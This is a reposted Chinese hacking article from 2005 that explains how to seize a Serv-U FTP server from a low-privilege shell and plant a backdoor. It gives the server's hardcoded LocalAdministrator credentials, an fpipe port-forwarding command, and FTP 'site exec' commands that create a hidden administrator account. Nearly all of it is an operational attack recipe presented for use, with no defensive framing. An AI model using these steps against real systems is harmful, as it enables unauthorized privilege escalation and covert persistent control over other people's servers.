|
|
|
|
利用SERV-U后门做个后门 |
|
|
|
作者:佚名 来源:月光软件站 加入时间:2005-3-1 月光软件站 |
|
前几天在灰色轨迹上看到呢SERV-U下提升权限的一种新的方法~
以下转自:19800729
[serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个
版本中是固定的,也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了]
这种方法我在本地测试呢一下发现效果非常的好~!
转念一想,可以用他做个后门
方法同上
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:#l@$ak#.lk;0@P
连上后,先建一个用户 目录指向c:\ 给他执行权限
使用方法
cmd
ftp 192.168.0.1
username
password
ftp>cd /winnt/system32
ftp>quote site exec net.exe user axin 1234 /add
ftp>quote site exec net.exe localgroup administrators axin /add
一个非常隐蔽的后门做成了
|
|
相关文章:浅析2004年出现的4种新后门技术独裁者后门的手工清除黑客后门:asp木马配合servu取管理权限网络“后门”-端口的故事⑨超小的简单渗透asp后门.asp脚本图片类后门的完美使用方法实现Ddos独裁者里的后门建造永不被杀的80端口后门系统后门的真面目<一>系统后门的真面目<二>Win2000/XP中的自启动“后门”关上可恶的后门-消除NetBIOS隐患网络世界的“后门”-端口的故事⑨建造永不被杀的80端口后门相关软件: |
|
本类阅读TOP10